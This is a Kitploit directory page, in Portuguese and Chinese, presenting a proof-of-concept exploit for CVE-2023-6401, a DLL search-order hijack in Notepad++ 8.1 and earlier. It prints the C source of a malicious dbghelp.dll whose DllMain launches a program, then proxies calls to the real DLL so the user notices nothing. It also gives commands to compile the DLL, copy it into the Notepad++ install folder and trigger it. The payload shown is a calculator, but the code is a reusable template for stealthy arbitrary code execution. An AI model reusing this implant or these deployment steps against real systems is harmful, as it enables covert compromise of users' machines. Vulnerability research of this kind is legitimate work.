Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-6401 — CVE-2023-6401 é uma vulnerabilidade de sequestro de DLL que permite que atacantes executem código arbitrário colocando um arquivo `dbghelp.dll` malicioso no diretório do aplicativo. Este projeto demonstra a vulnerabilidade e fornece um PoC reproduzível. | Kitploit
Ferramentas/GitHubGitHub/mekitoci/cve-2023-6401
Análise de VulnerabilidadesExploraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de Binários
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401 é uma vulnerabilidade de sequestro de DLL que permite que atacantes executem código arbitrário colocando um arquivo `dbghelp.dll` malicioso no diretório do aplicativo. Este projeto demonstra a vulnerabilidade e fornece um PoC reproduzível.

Ver Repositório
17há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-6401 · Prova de Conceito de DLL Hijacking

License Platform

Português | 中文


中文

⚠️ 重要聲明:僅供安全研究和教育目的使用

NotePad++ ≤ 8.1 DLL劫持漏洞的概念驗證。通過在應用程式目錄放置惡意 dbghelp.dll 來執行任意程式碼。

快速開始

root@kitploit:~
# 下載專案
git clone https://github.com/mekitoci/CVE-2023-6401.git

# 進入專案目錄
cd CVE-2023-6401-main

# 編譯DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# 部署到NotePad++目錄
copy dbghelp.dll "C:\Program Files\Notepad++\"

# 執行測試
"C:\Program Files\Notepad++\notepad++.exe"

# 立即清理
del "C:\Program Files\Notepad++\dbghelp.dll"

預期結果: 計算器彈出 + 訊息框顯示 + NotePad++正常啟動

PoC result

漏洞詳情

項目詳情
CVE編號CVE-2023-6401
影響版本NotePad++ ≤ 8.1
漏洞類型DLL劫持 / 搜尋路徑劫持
影響執行任意程式碼
前提條件應用程式目錄寫入權限

原理

Windows按以下順序載入DLL:

  1. 應用程式目錄(最高優先級)
  2. System32目錄
  3. Windows目錄
  4. 當前目錄
  5. PATH環境變數

NotePad++啟動時會載入 dbghelp.dll,通過在應用程式目錄放置同名惡意DLL,可在系統DLL載入前執行程式碼。

技術實現

核心代碼

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // 執行惡意程式碼
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // 載入真實DLL並轉發API調用
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

關鍵特點

  • 搜尋順序劫持:利用Windows DLL搜尋機制
  • API轉發:載入真實DLL並轉發函式調用,保持應用程式正常運行
  • 隱蔽性:用戶察覺不到異常

編譯選項

MinGW (推薦)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

清理

root@kitploit:~
# 移除惡意DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# 確認移除
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "清理完成"

參考資料

  • CVE-2023-6401
  • Microsoft DLL搜尋順序
  • MITRE ATT&CK T1574.001

免責聲明

本專案僅供教育和安全研究使用。使用者需對遵守適用法律法規承擔全部責任。


Português {#english}

⚠️ AVISO IMPORTANTE: Apenas para fins de pesquisa em segurança e educação

Prova de conceito para a vulnerabilidade de DLL hijacking no NotePad++ ≤ 8.1. Execute código arbitrário colocando um dbghelp.dll malicioso no diretório do aplicativo.

Início Rápido

root@kitploit:~
# Clone the project
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Navigate to project directory
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Deploy to NotePad++ directory
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Execute test
"C:\Program Files\Notepad++\notepad++.exe"

# Immediate cleanup
del "C:\Program Files\Notepad++\dbghelp.dll"

Resultado Esperado: Calculadora abre + Caixa de mensagem exibida + NotePad++ inicia normalmente

PoC result

Detalhes da Vulnerabilidade

ItemDetalhes
Número CVECVE-2023-6401
Versões AfetadasNotePad++ ≤ 8.1
Tipo de VulnerabilidadeDLL Hijacking / Sequestro de Ordem de Pesquisa
ImpactoExecução de Código Arbitrário
Pré-requisitosPermissão de escrita no diretório do aplicativo

Mecanismo

O Windows carrega DLLs na seguinte ordem:

  1. Diretório do aplicativo (maior prioridade)
  2. Diretório System32
  3. Diretório Windows
  4. Diretório atual
  5. Variável de ambiente PATH

O NotePad++ carrega dbghelp.dll na inicialização. Ao colocar uma DLL maliciosa com o mesmo nome no diretório do aplicativo, o código pode ser executado antes que a DLL do sistema seja carregada.

Implementação Técnica

Código Principal

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Execute malicious code
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Load real DLL and forward API calls
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Características Principais

  • Sequestro de Ordem de Pesquisa: Explora o mecanismo de pesquisa de DLL do Windows
  • Encaminhamento de API: Carrega a DLL real e encaminha chamadas de função para manter a operação normal do aplicativo
  • Furtividade: Os usuários não percebem anormalidades

Opções de Compilação

MinGW (Recomendado)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Limpeza

root@kitploit:~
# Remove malicious DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# Confirm removal
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Cleanup completed"

Referências

  • CVE-2023-6401
  • Ordem de Pesquisa de DLL da Microsoft
  • MITRE ATT&CK T1574.001

Aviso Legal

Este projeto é apenas para fins educacionais e de pesquisa em segurança. Os usuários são os únicos responsáveis pela conformidade com as leis e regulamentos aplicáveis.

Baixar ferramenta